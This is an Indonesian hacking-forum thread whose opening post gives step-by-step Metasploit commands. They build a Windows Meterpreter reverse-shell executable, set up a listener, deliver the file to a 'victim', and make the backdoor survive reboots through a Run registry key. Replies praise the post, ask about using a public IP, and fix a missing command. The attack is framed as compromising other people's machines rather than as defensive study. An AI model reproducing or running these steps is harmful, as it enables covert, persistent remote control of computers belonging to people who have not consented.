Membuat payload meterpreter permanent
#1
[Image: images?q=tbn:ANd9GcRATzK0Bd0wveLWIueFujS...YHKtTAN5Sg]

langsung saja ya..

buka metasploit kalian disini saya menggunkan backtrack 5 r3

buka terminal ketikkan msfconsole untuk membuka metasploit

[Image: Selection_001.png]


lalu masukkan exploit sebagai berikut


use exploit/multi/handler
set lport 4444
set lhost 192.168.1.73 ( isi dengan ip kalian )
exploit

[Image: Selection_005.png]


setelah itu kita bikin listener dengan meterpreter

buka terminal baru ketikkan perintah

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.73 x > Desktop/4444.exe

disini nama payload saya adalah 4444.exe

[Image: Selection_002.png]


setelah itu kirim payload tersebut ke pc korban atau dengan teknik lain

[Image: Capture.PNG]



setelah korban mengeksekusi file payload tersebut
maka session meterpreter akan terbuka


[Image: Selection_006.png]

setelah itu ketikkan perintah background pada meterpreter untuk memulai aksi mempermnentkan meterpreter


dan kita akan mencari exploit permanentnya dengan mengetik perintah
search persistence


[Image: Selection_007.png]

dan lanjutkan untuk perintah selanjutnya

use post/windows/manage/persistence
set lhost 192.168.1.73
set lport 4444
set rexe /root/Desktop/4444.exe
set rexename xbuster404.exe
set session 1
exploit

dan sukses meterpreter sudah tertanam pada pc korban

[Image: Selection_008.png]


sekarang kita coba test untuk membuktkanya
dengan me-reboot pc korban


[Image: Selection_009.png]


dan pc korban kembali hidup
maka meterpreter session akan terbuka lagi Smile


[Image: Selection_011.png]

[Image: Selection_012.png]

payload tersebut berada pada regedit HKCU > Software > Microsoft > Windows > CurrentVersion > RUN

[Image: Capture.PNG]


selamat berexploitasi

#2
Nice banget om...
rajin-rajin update begini'an dah.. gw demen banget :-bd :-bd

#3
kalo pake IP publick gmn yah?

#4
(05-15-2013, 08:06 PM)yhojoon Wrote: kalo pake IP publick gmn yah?

setting dulu ip forarnya bro

\m/

#5
nice share coy...

cocok..
Hidup Harus Di Bawa Happy..!!!

#6
nice broo Smile
oia itukan lhost=192.168.1.73, misalx ip kita terganti, apa kita harus membuat payload baru lagi lalu infeksi ulang komputer korban ?

#7
keren om..izin belajar Smile

Hacking For Security | Beda Alam Beda Akhirat.

#8
bro kok ga bisa ya kalo dibuat permanen, tapi kalo di sessions -i 1 bisa masuk meterpreter, di reboot juga bisa,,apa gara2 rename nya ga sesuai tutor Angry
kaya gini tampilannya

[Image: Screenshot-2_zps17f17843.png]

#9
(05-21-2013, 12:46 AM)child Wrote: bro kok ga bisa ya kalo dibuat permanen, tapi kalo di sessions -i 1 bisa masuk meterpreter, di reboot juga bisa,,apa gara2 rename nya ga sesuai tutor Angry
kaya gini tampilannya


sory bro rules

lagi sibuk

itu perintahnya kurang bro set payload nya

seperti

set rexe /root/Desktop/4444.exe

Smile:-

#10
(05-21-2013, 06:08 PM)xbuster404 Wrote:
(05-21-2013, 12:46 AM)child Wrote: bro kok ga bisa ya kalo dibuat permanen, tapi kalo di sessions -i 1 bisa masuk meterpreter, di reboot juga bisa,,apa gara2 rename nya ga sesuai tutor Angry
kaya gini tampilannya


sory bro rules

lagi sibuk

itu perintahnya kurang bro set payload nya

seperti

set rexe /root/Desktop/4444.exe

Smile:-

ow iya bro, sory2 ada yg kelewatan :d
biar tak coba lg





Users browsing this thread: 2 Guest(s)